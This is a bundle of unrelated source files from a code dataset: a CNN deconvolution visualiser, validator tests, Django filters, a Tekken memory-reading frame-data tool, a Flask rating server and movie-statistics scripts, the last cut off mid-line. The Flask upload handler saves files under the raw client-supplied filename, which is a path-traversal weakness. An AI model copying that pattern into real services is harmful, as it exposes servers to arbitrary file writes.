np.argsort(Norm1)[-n_best:]\n \n # deconvolute\n unConv2 = self.deconvLayer2( inputImage, inputLabel, isolated )\n \n u = unConv2.eval()\n \n u = u[best,]\n best_index[j,:] = best\n \n #imsave(\"img/Deconv2_Node_{}_of_Image1.jpg\".format(i), u[0,:,:,:])\n \n all_isolations[j,:,:,:,:] = u\n j = j + 1\n \n \n return all_isolations, best_index, filters\n\n\n def displayFeatures3( self, inputImage, inputLabel, n_best = 3, k = 3):\n\n ##\n ## Deconvoluting 2nd layer\n ##\n\n # get activations for layer 2\n activations3 = self.calculateActivations(inputImage, inputLabel, 3)\n random.seed(3)\n filters = random.sample(range(activations3.shape[-1]), k)\n aux = activations3.shape[0] - n_best\n \n all_isolations = np.zeros([k, n_best, 128, 128, 3])\n j = 0\n best_index = np.zeros([k, n_best])\n \n for i in range(filters):\n # Isolate filters\n if i % 5 == 0:\n print(\"Deconvoluting Layer 3 activation number: {}\".format(i))\n isolated = activations3.copy()\n isolated[:,:,:,:i] = 0\n isolated[:,:,:,i+1:] = 0\n \n Norm1 = np.linalg.norm(isolated[:,:,:,i], axis = (1, 2))\n #Norm2 = np.linalg.norm(Norm1, axis = 1)\n \n best = np.argsort(Norm1)[-n_best:]\n \n # deconvolute\n unConv3 = self.deconvLayer3( inputImage, inputLabel, isolated )\n \n u = unConv3.eval()\n \n u = u[best,]\n best_index[j,:] = best\n \n #imsave(\"img/Deconv3_Node_{}_of_Image1.jpg\".format(i), u[0,:,:,:])\n \n all_isolations[j,:,:,:,:] = u\n j = j + 1\n \n \n return all_isolations, best_index, filters \n\n\n # calculate activations for layer (1 or 2)\n def calculateActivations( self, inputImage, inputLabel, layer ):\n\n if( layer == 1 ):\n return self.cnn.pool1.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n elif( layer == 2 ):\n return self.cnn.pool2.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n else:\n return self.cnn.pool3.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n \n def calculateActivationsFeature( self, inputImage, inputLabel, layer ):\n\n if( layer == 1 ):\n return self.cnn.relu1.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n elif( layer == 2 ):\n return self.cnn.relu2.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n else:\n return self.cnn.relu3.eval(feed_dict={self.cnn.x: np.reshape(inputImage,[-1,int(self.cnn.n_in*self.cnn.n_in*self.cnn.nChannels)])})\n\n\n def getDeconv( self ):\n return self.deconv1, self.deconv2, self.deconv3\n\n # method to unpool (taken from kvfrans - put link!)\n def unpool( self, value ):\n \"\"\"N-dimensional version of the unpooling operation from\n https://www.robots.ox.ac.uk/~vgg/rg/papers/Dosovitskiy_Learning_to_Generate_2015_CVPR_paper.pdf\n\n :param value: A Tensor of shape [b, d0, d1, ..., dn, ch]\n :return: A Tensor of shape [b, 2*d0, 2*d1, ..., 2*dn, ch]\n \"\"\"\n #with tf.name_scope(name) as scope:\n sh = value.get_shape().as_list()\n dim = len(sh[1:-1])\n out = (tf.reshape(value, [-1] + sh[-dim:]))\n for i in range(dim, 0, -1):\n out = tf.concat( [out, out], i)\n out_size = [-1] + [s * 2 for s in sh[1:-1]] + [sh[-1]]\n out = tf.reshape(out, out_size)#, name=scope)\n return out\n","sub_path":"lib/ConvDeconvDataSet2.py","file_name":"ConvDeconvDataSet2.py","file_ext":"py","file_size_in_byte":24180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"573350357","text":"import pkg_resources\nimport pytest\n\nfrom yass.config.validator import Validator\n\n\ndef test_rejects_dict_with_missing_required_sections():\n d = dict(a=1, b=2)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n validator = Validator(d, required_sections, optional_sections)\n\n message = 'The following sections are required c'\n\n with pytest.raises(ValueError, message=message):\n validator.validate()\n\n\ndef test_rejects_dict_with_invalid_sections():\n d = dict(a=1, b=2, c=3, e=5, f=6)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n validator = Validator(d, required_sections, optional_sections,\n allow_extras=False)\n message = 'The following sections are invalid: e, f'\n\n with pytest.raises(ValueError) as exception:\n validator.validate()\n\n assert str(exception.value) == message\n\n\ndef test_fills_optional_missing_sections():\n d = dict(a=1, b=2, c=3)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n validator = Validator(d, required_sections, optional_sections)\n\n validated = validator.validate()\n\n assert validated['d'] == 4\n\n\ndef test_validates_fields_type():\n d = dict(a=dict(a_num='not a num', a_cat='val', a_str='a str'), b=2, c=3)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n fields_validator = dict(a=dict(a_num=dict(type='int'),\n a_cat=dict(type='str', values='val'),\n a_str=dict(tyle='str')))\n\n validator = Validator(d, required_sections, optional_sections,\n fields_validator)\n\n message = 'Value in \"a.a_num\" must be \"int\" but it is \"str\"'\n\n with pytest.raises(ValueError) as exception:\n validator.validate()\n\n assert str(exception.value) == message\n\n\ndef test_validates_fields_values():\n d = dict(a=dict(a_num=1, a_cat='not val', a_str='a str'), b=2, c=3)\n required_sections = ['a', 'b', 'c']\n optional_sections = dict(d=4)\n fields_validator = dict(a=dict(a_num=dict(type='int'),\n a_cat=dict(type='str', values=['val',\n 'val2']),\n a_str=dict(tyle='str')))\n\n validator = Validator(d, required_sections, optional_sections,\n fields_validator)\n\n message = 'Value in \"a.a_cat\" is invalid, valid values are \"val, val2\"'\n\n with pytest.raises(ValueError) as exception:\n validator.validate()\n\n assert str(exception.value) == message\n\n\ndef test_can_validate_with_custom_rules():\n d = dict(a=dict(a_path='file_in_assets_model.txt'))\n required_sections = ['a']\n optional_sections = dict(b=1)\n fields_validator = dict(a=dict(a_path=dict(function='expand_asset_model')))\n\n validator = Validator(d, required_sections, optional_sections,\n fields_validator)\n validated = validator.validate()\n\n path = 'assets/models/file_in_assets_model.txt'\n path_absolute = pkg_resources.resource_filename('yass', path)\n\n assert path_absolute == validated['a']['a_path']\n","sub_path":"tests/test_validator.py","file_name":"test_validator.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"516868798","text":"from swarms.model import EnvironmentModel\nfrom swarms.agent import SwarmAgent\n\nimport argparse\n\n## Global variables for width and height\nwidth = 50\nheight = 50\n\ndef main():\n \n env = EnvironmentModel(10, width, height)\n\n for i in range(1000):\n env.step()\n\n for agent in env.schedule.agents:\n print (agent.unique_id, agent.wealth)\n\nif __name__ == '__main__':\n main()","sub_path":"examples/geese/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96415985","text":"#\n# Copyright (C) 2018-2022 S[&]T, The Netherlands.\n#\n\nfrom __future__ import absolute_import, division, print_function\n\nimport logging\nfrom copy import copy\n\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nfrom django.db.models import fields as django_fields\nfrom django.db.models import Lookup\nfrom django.core.exceptions import FieldDoesNotExist\nfrom rest_framework.filters import OrderingFilter\nfrom django_filters import rest_framework as filters\nfrom django.contrib.gis.db.models import GeometryField\nfrom rest_framework_gis.filters import GeometryFilter\n\nfrom muninn_django.naiveutcdatetime.modelfields import NaiveDateTimeField\nfrom muninn_django.naiveutcdatetime.forms import NaiveUtcIsoDateTimeFilter\n\n\nlogger = logging.getLogger(__name__)\n\n\n@django_fields.Field.register_lookup\nclass NotEqual(Lookup):\n '''django \"__ne\" custom lookup'''\n lookup_name = 'ne'\n\n def as_sql(self, compiler, connection):\n lhs, lhs_params = self.process_lhs(compiler, connection)\n rhs, rhs_params = self.process_rhs(compiler, connection)\n params = lhs_params + rhs_params\n return '%s <> %s' % (lhs, rhs), params\n\n\nclass CharInFilter(filters.BaseInFilter, filters.CharFilter):\n pass\n\n\nclass ProductFilter(filters.FilterSet):\n\n # `in` implicitly supports `exact` :)\n # `distinct=True` is required to remove duplicates that the underlying inner join produces\n tag = CharInFilter(field_name='tags__tag', lookup_expr='in', distinct=True)\n\n source_product = filters.CharFilter(field_name='source_products__uuid', lookup_expr='exact')\n derived_product = filters.CharFilter(field_name='derived_products__uuid', lookup_expr='exact')\n\n class Meta(object):\n model = None # to be overriden\n filter_overrides = {\n NaiveDateTimeField: {\n 'filter_class': NaiveUtcIsoDateTimeFilter,\n },\n GeometryField: {\n 'filter_class': GeometryFilter,\n }\n }\n\n\ndef _get_filters(model_class, preffix=None, disabled_lookups=None):\n result = {}\n for field in model_class._meta.fields:\n filter_def = list(type(field).get_lookups().keys())\n if filter_def and field.name != '_core':\n name = '%s__%s' % (preffix, field.name) if preffix else field.name\n filter_def = [x for x in filter_def if not x in disabled_lookups]\n result[name] = filter_def\n\n return result\n\n\nclass ProductFilterFactory(object):\n @classmethod\n def get(cls, archive, model_class):\n name = 'ProductFilter'\n\n disabled_lookups = settings.MUNINN[archive].get('disabled_lookups', [])\n meta_fields = _get_filters(model_class, disabled_lookups=disabled_lookups)\n for ns, ns_class_path in settings.MUNINN[archive]['models'].items():\n if ns != 'core':\n ns_class = import_string(ns_class_path)\n meta_fields.update(_get_filters(ns_class, preffix=ns, disabled_lookups=disabled_lookups))\n\n meta_body = {}\n meta_body['__module__'] = '%s.%s.%s' % (__name__, archive, name)\n meta_body['model'] = model_class\n meta_body['fields'] = meta_fields\n meta_class = type('Meta', (ProductFilter.Meta, ), meta_body)\n\n body = {}\n body['__module__'] = '%s.%s' % (__name__, archive)\n body['Meta'] = meta_class\n newclass = type(name, (ProductFilter, ), body)\n\n return newclass\n\n\nclass RelatedOrderingFilter(OrderingFilter):\n \"\"\"\n\n See: https://github.com/encode/django-rest-framework/issues/1005\n\n Extends OrderingFilter to support ordering by fields in related models\n using the Django ORM __ notation\n \"\"\"\n def is_valid_field(self, model, field):\n \"\"\"\n Return true if the field exists within the model (or in the related\n model specified using the Django ORM __ notation)\n \"\"\"\n components = field.split('__', 1)\n try:\n field = model._meta.get_field(components[0])\n\n if isinstance(field, django_fields.reverse_related.OneToOneRel):\n return self.is_valid_field(field.related_model, components[1])\n\n # reverse relation\n if isinstance(field, django_fields.reverse_related.ForeignObjectRel):\n return self.is_valid_field(field.model, components[1])\n\n # foreign key\n if field.remote_field and len(components) == 2:\n return self.is_valid_field(field.related_model, components[1])\n return True\n except FieldDoesNotExist:\n return False\n\n def remove_invalid_fields(self, queryset, fields, ordering, view):\n return [term for term in fields\n if self.is_valid_field(queryset.model, term.lstrip('-'))]\n","sub_path":"muninn_django/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"252622870","text":"import matplotlib \nmatplotlib.use('Agg')\nimport pandas as pd\nimport pylab as plt\nimport numpy as np\nfig = plt.figure()\nax = fig.add_axes([0.15, 0.1, 0.8, 0.8])\ndf = pd.read_table('DCM-Exon-Coverage-Table-Genes', header=0)\ndf2 = np.log2(df.ix[:, -3:]+1)\n#df2 = df.ix[:, -3:]\ndf2.plot(kind='hist', stacked=True, ax = ax, color=['r','g','b'])\nax.set_xlabel('Coverage, log2(x+1)')\nax.set_ylabel('Number of Exons')\nax.set_title('3574 Exons of 95 Genes')\nplt.savefig('ExonCoverage.pdf')\n\n","sub_path":"DCM/12-CheckCoverageOfSomeGenes/12-hist.py","file_name":"12-hist.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2726222","text":"import ctypes\nimport enum\nimport struct\n\nfrom . import GameSnapshot, MoveInfoEnums\nfrom game_parser import MovelistParser\nfrom misc import ConfigReader, Flags\nfrom misc.Windows import w as Windows\n\n# I have no idea how this file works\n\ngame_string = 'TekkenGame-Win64-Shipping.exe'\n\nclass AddressType(enum.Enum):\n _float = 0\n _64bit = 1\n _string = 2\n\nclass AcquireState(enum.Enum):\n need_pid = 0\n need_module = 1\n need_names = 2\n has_everything = 3\n\nclass GameReader:\n def __init__(self):\n self.acquire_state = AcquireState.need_pid\n self.pid = None\n self.module_address = 0\n self.is_player_player_one = True # default\n self.c = ConfigReader.ConfigReader('memory_address')\n self.player_data_pointer_offset = self.c['MemoryAddressOffsets']['player_data_pointer_offset']\n self.p1_movelist_parser = None\n self.p2_movelist_parser = None\n\n def get_value_from_address(self, process_handle, address, address_type):\n if address_type is AddressType._string:\n data = ctypes.create_string_buffer(16)\n bytes_read = ctypes.c_ulonglong(16)\n elif address_type is AddressType._64bit:\n data = ctypes.c_ulonglong()\n bytes_read = ctypes.c_ulonglong()\n else:\n data = ctypes.c_ulong()\n bytes_read = ctypes.c_ulonglong(4)\n\n successful = Windows.read_process_memory(process_handle, address, ctypes.byref(data), ctypes.sizeof(data), ctypes.byref(bytes_read))\n if not successful:\n e = Windows.get_last_error()\n # known problem of failing to read_process_memory\n # when not in a fight\n if not (e == 299 and self.acquire_state == AcquireState.need_names):\n print(\"read_process_memory Error: Code %s\" % e)\n return 0\n\n value = data.value\n\n if address_type is AddressType._float:\n return struct.unpack(\"= len(last_eight_frames):\n print(\"ERROR: requesting %s frame of %s long rollback frame\" % (rollback_frame, len(last_eight_frames)))\n return None\n\n best_frame_count, player_data_second_address = sorted(last_eight_frames, key=lambda x: -x[0])[rollback_frame]\n\n player_data_frame = self.get_block_of_data(process_handle, player_data_second_address, self.c['MemoryAddressOffsets']['rollback_frame_offset'])\n\n p1_dict = {}\n p2_dict = {}\n\n self.read_from_addresses(p1_dict, p2_dict, player_data_frame)\n\n p1_snapshot = GameSnapshot.PlayerSnapshot(p1_dict)\n p2_snapshot = GameSnapshot.PlayerSnapshot(p2_dict)\n\n facing = self.get_value_from_data_block(player_data_frame, self.c['GameDataAddress']['facing'])\n\n if self.acquire_state == AcquireState.need_names and p1_snapshot.character_name != MoveInfoEnums.CharacterCodes.NOT_YET_LOADED.name and p2_snapshot.character_name != MoveInfoEnums.CharacterCodes.NOT_YET_LOADED.name:\n self.reacquire_names(process_handle)\n\n return GameSnapshot.GameSnapshot(p1_snapshot, p2_snapshot, best_frame_count, facing, self.is_player_player_one)\n\n def reacquire_module(self):\n print(\"Trying to acquire Tekken library in pid: %s\" % self.pid)\n self.module_address = Windows.get_module_address(self.pid, game_string)\n if self.module_address is None:\n print(\"%s not found. Likely wrong process id. Reacquiring pid.\" % game_string)\n self.pid = None\n elif self.module_address != self.c['MemoryAddressOffsets']['expected_module_address']:\n print(\"Unrecognized location for %s module. Tekken.exe Patch? Wrong process id?\" % game_string)\n else:\n print(\"Found %s\" % game_string)\n self.acquire_state = AcquireState.need_names\n\n def get_player_data_base_address(self, process_handle):\n addresses = split_str_to_hex(self.player_data_pointer_offset)\n address = self.module_address\n for i, offset in enumerate(addresses):\n address += offset\n if i + 1 < len(addresses):\n address = self.get_value_from_address(process_handle, address, AddressType._64bit)\n else:\n address = self.get_value_from_address(process_handle, address, None)\n return address\n\n def get_last_eight_frames(self, process_handle, player_data_base_address):\n last_eight_frames = []\n\n second_address_base = self.get_value_from_address(process_handle, player_data_base_address, AddressType._64bit)\n offset = self.c['MemoryAddressOffsets']['rollback_frame_offset']\n frame_count = self.c['GameDataAddress']['frame_count']\n for i in range(8): # for rollback purposes, there are 8 copies of the game state, each one updatating once every 8 frames\n potential_second_address = second_address_base + (i * offset)\n potential_frame_count = self.get_value_from_address(process_handle, potential_second_address + frame_count, None)\n last_eight_frames.append((potential_frame_count, potential_second_address))\n return last_eight_frames\n\n def read_from_addresses(self, p1_dict, p2_dict, player_data_frame):\n for data_type, value in self.c['PlayerDataAddress'].items():\n p1_value = self.get_value_from_data_block(player_data_frame, value, 0, self.is_data_a_float(data_type))\n p2_value = self.get_value_from_data_block(player_data_frame, value, self.c['MemoryAddressOffsets']['p2_data_offset'], self.is_data_a_float(data_type))\n address = 'PlayerDataAddress.%s' % data_type\n p1_dict[address] = p1_value\n p2_dict[address] = p2_value\n\n for data_type, value in self.c['EndBlockPlayerDataAddress'].items():\n p1_value = self.get_value_from_data_block(player_data_frame, value)\n p2_value = self.get_value_from_data_block(player_data_frame, value, self.c['MemoryAddressOffsets']['p2_end_block_offset'])\n address = 'EndBlockPlayerDataAddress.%s' % data_type\n p1_dict[address] = p1_value\n p2_dict[address] = p2_value\n\n position_offset = 32 # our xyz coordinate is 32 bytes, a 4 byte x, y, and z value followed by five 4 byte values that don't change\n for axis, starting_address in ((k, v) for k, v in self.c['PlayerDataAddress'].items() if k in ('x', 'y', 'z')):\n p1_coord_array = []\n p2_coord_array = []\n for i in range(23):\n address = starting_address + (i * position_offset)\n p1_coord_array.append(self.get_value_from_data_block(player_data_frame, address, 0, is_float=True))\n p2_coord_array.append(self.get_value_from_data_block(player_data_frame, address, self.c['MemoryAddressOffsets']['p2_data_offset'], is_float=True))\n address = 'PlayerDataAddress.%s' % axis\n p1_dict[address] = p1_coord_array\n p2_dict[address] = p2_coord_array\n\n p1_dict['movelist_parser'] = self.p1_movelist_parser\n p2_dict['movelist_parser'] = self.p2_movelist_parser\n\n def reacquire_names(self, process_handle):\n if not Flags.Flags.no_movelist:\n opponent_side = self.get_value_at_end_of_pointer_trail(process_handle, \"OPPONENT_SIDE\", False)\n self.is_player_player_one = (opponent_side == 1)\n\n p1_movelist_block, p1_movelist_address = self.populate_movelists(process_handle, \"P1_Movelist\")\n p2_movelist_block, p2_movelist_address = self.populate_movelists(process_handle, \"P2_Movelist\")\n\n self.p1_movelist_parser = MovelistParser.MovelistParser(p1_movelist_block, p1_movelist_address)\n self.p2_movelist_parser = MovelistParser.MovelistParser(p2_movelist_block, p2_movelist_address)\n print(\"acquired movelists\")\n\n self.acquire_state = AcquireState.has_everything\n\n def populate_movelists(self, process_handle, data_type):\n movelist_str = self.c[\"NonPlayerDataAddresses\"][data_type]\n movelist_trail = split_str_to_hex(movelist_str)\n\n movelist_address = self.get_value_from_address(process_handle, self.module_address + movelist_trail[0], AddressType._64bit)\n movelist_block = self.get_block_of_data(process_handle, movelist_address, self.c[\"MemoryAddressOffsets\"][\"movelist_size\"])\n\n return movelist_block, movelist_address\n\ndef split_str_to_hex(string):\n return list(map(to_hex, string.split()))\n\ndef to_hex(x):\n return int(x, 16)\n","sub_path":"src/game_parser/GameReader.py","file_name":"GameReader.py","file_ext":"py","file_size_in_byte":12535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"644064137","text":"# A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).\n\n# The robot can only move either down or right at any point in time. \n# The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).\n\n# How many possible unique paths are there?\n\n\n# Input: m = 3, n = 2\n# Output: 3\n# Explanation:\n# From the top-left corner, there are a total of 3 ways to reach the bottom-right corner:\n# 1. Right -> Right -> Down\n# 2. Right -> Down -> Right\n# 3. Down -> Right -> Right\n\n # Index 0 1 2\n # 0 [s] [] []\n # 1 [] [] []\n # 2 [] [] []\n # 3 [] [] [d] (3,2)\n\ndef helperUniquePaths(rows,cols,memo):\n \n key = str(rows) + \"-\" + str(cols)\n if key in memo:\n return memo[key]\n\n ## Check for invalid squares\n if rows < 0:\n return 0\n if cols < 0:\n return 0\n\n ## Base Case\n ## Return once destination is reached\n if rows == 0 and cols == 0:\n return 1\n else:\n ## Explore\n result = helperUniquePaths(rows,cols - 1,memo) + helperUniquePaths(rows-1,cols,memo)\n memo[key] = result\n\n return memo[key]\n\n\ndef uniquePaths(m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n # m is the columns\n # n is the rows\n \n cols = m - 1\n rows = n - 1\n memo = {}\n return helperUniquePaths(cols,rows,memo)\n\n\ndef uniquePathsBottomUp(m,n):\n cols = m\n rows = n\n \n grid = [[0]*(cols) for i in range(rows)] \n \n for row in range(rows):\n for col in range(cols):\n if row == 0 and col == 0:\n grid[row][col] = 1 \n else:\n grid[row][col] = grid[row][col-1] + grid[row-1][col]\n\n return grid[row][col]\n\n\nif __name__ == \"__main__\":\n r = uniquePaths(7,3)\n print (r)\n r = uniquePathsBottomUp(7,3)\n print (r)","sub_path":"Leetcode/dp/unique_paths.py","file_name":"unique_paths.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97847375","text":"\"\"\"\nThis script runs the FlaskWebProject application using a development server.\n\"\"\"\n\nfrom os import environ\nfrom flask import Flask, jsonify, request, render_template\nfrom xlrd import open_workbook, XLRDError\nfrom lib import nn_predict\n \napp = Flask(__name__)\n\ndef test_book(filename):\n try:\n open_workbook(filename)\n except XLRDError:\n return False\n else:\n return True\n \ndef get_json_response(rows):\n response = jsonify(result = rows)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@app.route('/get_test_result')\ndef test_result():\n return get_json_response(nn_predict.load_graph())\n\n@app.route('/get_rating')\ndef get_rating():\n args = request.args.getlist('arg', type = float)\n rate(args)\n\n@app.route('/get_rating')\ndef rate(args):\n \"\"\"\n if(len(args) == 21):\n return nn_predict.rate(args)\n else:\n \"\"\"\n return \"-1 NOT AVAILABLE\"\n\n@app.route('/rating_result')\ndef rating_result():\n args = request.args.getlist('arg', type = float)\n compliance = request.args.get('compliance', default=0, type = int)\n office_ratio = request.args.get('officeRatio', default=0, type = float)\n windows_ratio = request.args.get('windowsRatio', default=0, type = float)\n sql_ratio = request.args.get('SQLRatio', default=0, type = float)\n win_factor = (1 - windows_ratio) * 10\n office_factor = (1 - office_ratio) * 10\n sql_factor = (1 - sql_ratio) * 10\n #for input in test_inputs.in_data:\n #print(\"\"\"Company: {0}, Rating: {1}\"\"\".format(input['company_name'], nn_predict.rateFromDict(input)))\n #rating = 100 - int(compliance) - (5 * (3 - int(rate(args)))) - win_factor - office_factor - sql_factor\n #data = {'rating': str(rating), 'windows_ratio': windows_ratio, 'sql_ratio': sql_ratio, 'office_ratio': office_ratio}\n data = {'rating': str(90), 'windows_ratio': windows_ratio, 'sql_ratio': sql_ratio, 'office_ratio': office_ratio}\n return render_template('result.html', data=data)\n \n@app.route('/rate_excel', methods = ['GET', 'POST'])\ndef rate_excel():\n data = {'rating': '0', 'test': ''}\n if request.method == 'POST':\n f = request.files['file']\n f.save(f.filename)\n wb = open_workbook(f.filename)\n test_string = ''\n s = wb.sheet_by_index(0)\n col_names = s.row(0)\n max_row = s.nrows\n row_count = max_row - 1\n rating = 0\n for row in range(1, max_row):\n row_dict = {}\n for name, col in zip(col_names, range(s.ncols)):\n value = (s.cell(row,col).value)\n try : value = float(value)\n except : pass\n row_dict[name.value] = value\n try: rating += int(nn_predict.rateFromDict(row_dict))\n except : \n print(\"Error calling nn_predict.rateFromDict()\")\n pass\n data = {'rating': str(float(rating / row_count)), 'test': test_string}\n return render_template('excel_result.html', data=data)\n\ndef home():\n return render_template('form.html')\n\n@app.route('/')\n@app.route('/home')\n@app.route('/excel')\n@app.route('/batch_rating')\ndef batch_rating():\n return render_template('batch_rating.html')\n\n\nif __name__ == '__main__':\n HOST = environ.get('SERVER_HOST', '0.0.0.0')\n try:\n PORT = int(environ.get('SERVER_PORT', '5555'))\n except ValueError:\n PORT = 5555\n app.run(HOST, PORT)\n","sub_path":"runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66216846","text":"t = int(input()) \r\nfor i in range(1, t + 1):\r\n n = int(input())\r\n vals = [int(si) for si in input().split()]\r\n \r\n abccap = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n\r\n #print(max(vals))\r\n res = ''\r\n maxv = max(vals)\r\n while maxv:\r\n #print(vals)\r\n if vals.count(maxv) > 1 and ((len(vals) - vals.count(0)) > 3 or (len(vals) - vals.count(0)) == 2):\r\n maxi = vals.index(maxv)\r\n maxj = vals.index(maxv, maxi + 1)\r\n vals[maxi] -= 1\r\n vals[maxj] -= 1\r\n res += abccap[maxi] + abccap[maxj] + ' '\r\n else:\r\n maxi = vals.index(maxv)\r\n vals[maxi] -= 1\r\n res += abccap[maxi] + ' '\r\n maxv = max(vals)\r\n\r\n print('Case #{}: {}'.format(i, res))\r\n","sub_path":"solutions_5753053697277952_0/Python/fooMichael/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244597103","text":"\"\"\"\n原始数据的统计函数和脚本\n\"\"\"\n\nimport json\nimport os\nimport time\nimport collections\n\nimport numpy as np\n\nfrom static import *\n\n\nf = open(all_tags_file, encoding='utf-8')\nall_tags_content = json.load(f)\ncount_all_tagged_movies = len(all_tags_content)\n\n\ndef get_files(file_dir):\n for root, dirs, files in os.walk(file_dir):\n # print(root) # 当前目录路径\n # print(dirs) # 当前路径下所有子目录\n # print(files) # 当前路径下所有非目录子文件\n files\n return files\n\n\nfiles = get_files(all_movies_dir)\n\n\n# 统计一个目录下json文件数,以及json中array数据的条数\ndef count_all_files(root_dir, files):\n file_count = 0 # 共计打开对少个文件\n count = 0 # 共计过少条记录\n for file in files:\n file_root = os.path.join(root_dir, file)\n f = open(file_root, encoding='utf-8')\n content = json.load(f)\n data = content[\"data\"] # data是一个list,每条记录为一个 dict\n count += len(data)\n if len(data):\n file_count += 1\n f.close()\n return count, file_count\n\n\ncount_all_movies, _ = count_all_files(all_movies_dir, files)\nprint(\"有标签的电影和所有电影:\", end='')\nprint(count_all_tagged_movies, count_all_movies)\nprint()\n\nmovie_order = 0\ntag_order = 0\nmovie_order_dict = {}\nmovie_list = []\ntag_order_dict = collections.OrderedDict()\n\ntags_set = set()\ntags_times = 0\nfor movie, tags in all_tags_content.items():\n tags_times += tags.__len__()\n tags_set.update(tags)\nprint(\"标签集合大小和打标签次数:\", end='')\nprint(tags_set.__len__(), tags_times)\nprint()\n\nfor tag in tags_set:\n tag_order_dict[tag] = tag_order\n tag_order += 1\n\n\nuser_item_matrix = np.zeros([count_all_movies, tags_set.__len__()], dtype=np.int32)\n\nfor movie, tags in all_tags_content.items():\n movie_order_dict[movie] = movie_order # 正取\n movie_list.append(movie) # 反取\n for tag in tags:\n tag_pos = tag_order_dict[tag]\n user_item_matrix[movie_order, tag_pos] += 1\n movie_order += 1\n\n\n# 文件树操作,打印所有文件\ndef walkdir(dirname):\n try:\n ls = os.listdir(dirname)\n except:\n print('access deny')\n else:\n for l in ls:\n temp = os.path.join(dirname, l)\n if os.path.isdir(temp):\n walkdir(temp)\n else:\n print(temp)\n\n\n# 目录中获取一级子目录下列表 与 get_files() 连用\ndef walk_into_dir(dirname):\n dir_list = []\n ls = os.listdir(dirname)\n for item in ls:\n temp = os.path.join(dirname, item)\n if os.path.isdir(temp):\n # temp += '\\\\'\n dir_list.append(temp)\n return dir_list\n\n\n# 此段大量文件读写代码不可执行,只记住结果即可\n'''\nstart = time.time()\nreview_dir = walk_into_dir(movie_review_dir)\ncount_reviewed_movies = 0\nreviews = 0\nfor root_dir in review_dir:\n files = get_files(root_dir)\n count = count_all_files(root_dir, files)\n reviews += count[0]\n if count[1]:\n count_reviewed_movies += count[1]\nprint(count_reviewed_movies, reviews)\nprint(time.time() - start)\n# 运行结果: 36540 1691793 # 长评的电影3万6,共有影评17万\n'''\n\n\n# 一个评分目录下,有影评的电影是否都是有标签的,遍历dict\ndef check(root_dir, files):\n check_count = 0\n file_count = 0\n for file in files:\n file_root = os.path.join(root_dir, file)\n f = open(file_root, encoding='utf-8')\n content = json.load(f)\n file_count += 1\n data = content[\"data\"] # data是一个list,每条记录为一个 dict\n if len(data):\n if os.path.splitext(file)[0] not in movie_order_dict.keys():\n check_count += 1\n f.close()\n return file_count, check_count\n\n\n'''\nreview_dir = walk_into_dir(movie_review_dir)\nfile_count = check_count = 0\nfor root_dir in review_dir:\n files = get_files(root_dir)\n tmp = check(root_dir, files)\n file_count += tmp[0]\n check_count += tmp[1]\nprint(file_count, check_count)\n# 运行结果: 影评文件数: 59548 有影评没标签的电影数: 4325\n'''\n\n# 取所有电影的评分作为字典\ndef get_movie_rate_dict():\n movie_rate_dict = {}\n for file in files:\n # print(\"current file\", file)\n file_root = os.path.join(all_movies_dir, file)\n f = open(file_root, encoding='utf-8')\n content = json.load(f)\n data = content[\"data\"] # data是一个list,每条记录为一个 dict\n for record in data:\n cur_movie = record['id']\n movie_rate_dict[cur_movie] = float(file[:3])\n f.close()\n return movie_rate_dict\n\n\nmovie_rate_dict = get_movie_rate_dict()\n\n# 生成 59000 部电影的评分矩阵\ndef generate_all_movie_rates():\n movie_rate_pos_dict = {}\n movie_rates_matrix = np.zeros([count_all_movies, tags_set.__len__()], dtype=np.int32)\n y = np.zeros([count_all_movies, 1], dtype=np.float32) # 评分预测值,根据下标取得分\n pos = 0\n for movie, rate in movie_rate_dict.items():\n y[pos] = rate\n movie_rate_pos_dict[movie] = pos\n movie_pos = movie_order_dict.get(movie, -1)\n if movie_pos > -1:\n movie_rates_matrix[pos] = user_item_matrix[movie_pos]\n else:\n pass\n pos += 1\n return movie_rates_matrix, y, movie_rate_pos_dict\n\nmovie_rates_matrix, movie_rates_y, 